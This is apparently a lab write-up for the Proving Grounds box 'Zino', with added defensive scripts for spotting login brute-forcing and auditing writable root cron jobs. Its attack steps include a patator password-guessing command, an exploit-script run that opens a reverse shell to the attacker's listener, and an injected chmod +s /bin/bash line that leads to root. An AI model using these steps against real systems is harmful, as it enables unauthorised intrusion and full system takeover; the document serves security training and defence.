Zino - OSPG
Summary Of Result
We exploit a vulnerable Booked Scheduler CMS to obtain initial access. We then escalate our privileges through a root cron job that executes a Python file under our control.
Attack Narrative
The attack is mounted in three main phases:
- Enumeration.
- Exploitation.
- Privilege Escalation.
Enumeration
Nmap
We will start with an nmap scan:
$ sudo nmap --open -sV -A -p- -vv -n -Pn $IP
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC44YysvRUv+02vB7LK+DbEvDnTUU2Zzaj42pbyX7gL4I5DhhWWZmK4Sr/MulEE2XPnKhXCCwTVuA12C/VuFhVdnq7WjDwfV+4a1DEuDG8P7wQAux0waAsly34mGtd7HQhQIv9h7nQWcTx8hoOrF6D71eHiZmLJ6fk01VlFN75XKJGn/T/ClJHz9UJ33zwkhqXskMO9At21LfOBE+I3IQCHuFFO6DcQWw/SsZaXQxHNzLqnI/9j1aQuvyuh6KMdT6p10D577maBz+T+Hyq/qeOgbGU0YGAoXXMU36FibkoQ+WwDRYbEHYKJccUXhzFWp980PYCIDtZNaWuo/AbgryLB
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOmcORNC6GjDnH1cqJrCeytZJjGrpJyY+CgseFsH27PJmSbmVYEz0ls0w/oXR0xrG/IfvxxyH9RRX2BIsBTx2cY=
| 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP9wfKL6wusRXGDMv5Tcf2OxMAIkhvOofRPsrSQ+aMbK
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, NULL, RPCCheck, SSLSessionReq, WMSRequest, oracle-tns:
|_ Host '192.168.49.156' is not allowed to connect to this MariaDB server
| mysql-info:
|_ MySQL Error: Host '192.168.49.156' is not allowed to connect to this MariaDB server
8003/tcp open http syn-ack ttl 63 Apache httpd 2.4.38
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Index of /
- We are particularly interested in the HTTP service running on port 8003.
HTTP Service - Port 8003
Let us navigate to the website:
$ curl -s http://192.168.175.64:8003 | html2text
****** Index of / ******
[[ICO]] Name Last_modified Size Description
===========================================================================
**[[DIR]] booked/ 2019-02-05 21:02 -**
===========================================================================
Apache/2.4.38 (Debian) Server at 192.168.175.64 Port 8003
Clicking on booked/, the website redirects us to a new directory, /Web/index.php:
$ curl -s http://192.168.156.64:8003/booked/Web/index.php | html2text
Toggle navigation [Booked_Scheduler_-_Log_In]
* Schedule
o View_Schedule
o View_Calendar
* Help
o Help
o About
* Log_In
[Booked Scheduler - Log In]
[email ]
[********************]
Log In
⁰ Remember Me
[...]
**Booked Scheduler v2.7.5**
The website appears to be running Booked Scheduler version 2.7.5.
After a little investigation, we discover that our target is running a vulnerable CMS version. Successful exploitation leads to Remote Code Execution.
$ searchsploit Booked Scheduler
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) | php/webapps/46486.rb
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
However, we need to note that the prerequisite for this exploit to work is a valid set of admin credentials.
Admin Credentials Attack
To mount a dictionary attack against the admin user, we use patator; the username is admin and the password dictionary is best1050.txt from seclists.
Our command is as follows:
$ patator http_fuzz url=http://192.168.156.64:8003/booked/Web/index.php method=POST body='email=admin&password=FILE0&captcha=&login=submit&resume=&language=en_us' 0=/usr/share/seclists/Passwords/Common-Credentials/best1050.txt follow=1 -x ignore:fgrep='could not match'
02:54:48 patator INFO - Starting Patator 0.9 (https://github.com/lanjelot/patator) with python-3.9.2 at 2021-08-15 02:54 EDT
02:54:48 patator INFO -
02:54:48 patator INFO - code size:clen time | candidate | num | mesg
02:54:48 patator INFO - -----------------------------------------------------------------------------
02:54:53 patator INFO - 200 13017:-1 1.005 | adminadmin | 118 | HTTP/1.1 200 OK
02:55:23 patator INFO - Hits/Done/Skip/Fail/Size: 1/1049/0/0/1049, Avg: 29 r/s, Time: 0h 0m 35s
After a few seconds, patator yielded adminadmin as the admin password.
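From the defender's side, a run like the one above (roughly 29 requests per second to the login page from a single client) stands out in the web server's access log. The following is an added example, not part of the original write-up: it parses constructed Apache combined-log lines and flags clients that exceed a number of login POSTs within a sliding window (the log format, login path, threshold and window are assumptions).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines: 120 POSTs to the login page from one client within
# four seconds, plus two ordinary requests from a normal browser client.
SAMPLE_LOG = [
    f'192.168.49.156 - - [15/Aug/2021:02:54:{48 + i // 30:02d} -0400] '
    '"POST /booked/Web/index.php HTTP/1.1" 200 13017 "-" "-"'
    for i in range(120)
] + [
    '10.0.0.5 - - [15/Aug/2021:02:55:01 -0400] "GET /booked/Web/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [15/Aug/2021:02:55:09 -0400] "POST /booked/Web/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Apache combined log format: client, ident, user, [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return m['ip'], ts, m['method'], m['path'], int(m['status'])


def find_login_bursts(lines, login_path='/booked/Web/index.php',
                      threshold=50, window=timedelta(seconds=60)):
    """Return {ip: peak_count} for clients that sent >= threshold login POSTs inside any window."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == 'POST' and rec[3] == login_path:
            posts[rec[0]].append(rec[1])
    offenders = {}
    for ip, times in posts.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                offenders[ip] = max(offenders.get(ip, 0), count)
    return offenders


if __name__ == '__main__':
    for ip, count in find_login_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {count} login POSTs within one window")
```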
Exploitation
Booked Scheduler File Upload
Since we have admin credentials, we can use any public exploit to obtain a reverse shell, or go through Metasploit; but since Metasploit is really unstable, we can also choose to exploit it manually.
- PoC can be found here.
(The below exploit script I used can be found here.)
- On our terminal, execute:
$ python3 booked_scheduler.py --url http://192.168.156.64:8003/booked/Web -u admin -p adminadmin -P 21 -H 192.168.49.156
[*] Checking host: http://192.168.156.64:8003/booked/Web
[+] Checking version Booked Scheduler v2.7.5: VULNERABLE !!!
[*] Checking credentials: admin:adminadmin
[+] Successfully logged in !.
[*] Grabing token: YjEzYzQ4NzIxMWZmMTU2MTU5N2NlMGM4NmI4MGJlMTE=
[*] Uploading backdoor shell...
[+] Trying to bind to :: on port 21: Done
[*] Triggering the shell ...
[+] Waiting for connections on :::21: Got connection from ::ffff:192.168.156.64 on port 58506
[*] Switching to interactive mode
bash: cannot set terminal process group (561): Inappropriate ioctl for device
bash: no job control in this shell
www-data@zino:/var/www/html/booked/Web$ $ www-data@zino:/var/www/html/booked$ $ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Our listener caught the reverse shell on port 21 as the www-data user.
Privilege Escalation
Crontab
Local enumeration reveals an interesting crontab entry.
www-data@zino:/home/peter$ $ cat /etc/crontab
[...]
*/3 * * * * root python /var/www/html/booked/cleanup.py
The /var/www/html/booked/cleanup.py file is executed every 3 minutes as root. More importantly, the file is also modifiable by everyone.
www-data@zino:/home/peter$ $ ls -al /var/www/html/booked/cleanup.py
ls -al /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 164 Apr 28 2020 /var/www/html/booked/cleanup.py
At this point, we can append an arbitrary command so that root sets the SUID bit on the /bin/bash executable.
www-data@zino:/var/www/html/booked$ $ echo "os.system('chmod +s /bin/bash')" >> /var/www/html/booked/cleanup.py
If everything works properly, after three minutes we should be able to execute /bin/bash with root privileges …
www-data@zino:/var/www/html/booked$ $ /bin/bash -p
/bin/bash -p
$ whoami
root
and become root!
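The root cause of this escalation is a root cron job pointing at a file that www-data owns and everyone can write. As an added example (not part of the original write-up), the script below parses /etc/crontab-style text, collects the absolute paths each root job references, and flags any that are group/other-writable or not owned by root; the sample crontab is constructed after the entry found on the box, and the audit accepts an injectable stat function so it can be tested offline.

```python
import os
import stat
import tempfile

# Constructed /etc/crontab content modelled on the entry found on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/3 * * * * root python /var/www/html/booked/cleanup.py
"""


def parse_system_crontab(text):
    """Yield (user, command) for each job line in /etc/crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith('#') or '=' in line.split()[0]:
            continue  # blank line, comment, or VAR=value assignment
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) == 7:
            yield fields[5], fields[6]


def script_paths(command):
    """Absolute paths mentioned in a cron command (interpreter scripts, directories)."""
    return [w for w in command.replace('&&', ' ').split() if w.startswith('/')]


def audit_crontab(text, stat_fn=os.stat):
    """Flag root jobs whose referenced files are group/other-writable or not root-owned."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != 'root':
            continue
        for path in script_paths(command):
            try:
                st = stat_fn(path)
            except FileNotFoundError:
                continue  # path does not exist on this host; nothing to assess
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) or st.st_uid != 0:
                findings.append((path, oct(stat.S_IMODE(st.st_mode)), st.st_uid))
    return findings


def demo():
    """Self-contained run: a constructed mode-777 script referenced by a root job."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, 'cleanup.py')
        open(script, 'w').close()
        os.chmod(script, 0o777)  # reproduces the -rwxrwxrwx seen on the box
        return audit_crontab(f"SHELL=/bin/sh\n*/3 * * * * root python {script}\n")


if __name__ == '__main__':
    for path, mode, uid in demo():
        print(f"root cron job runs {path}: mode {mode}, owner uid {uid}")
```

On a live host the same audit runs as `audit_crontab(open('/etc/crontab').read())`; the fix on this box is to make cleanup.py root-owned and mode 0755 (or 0700).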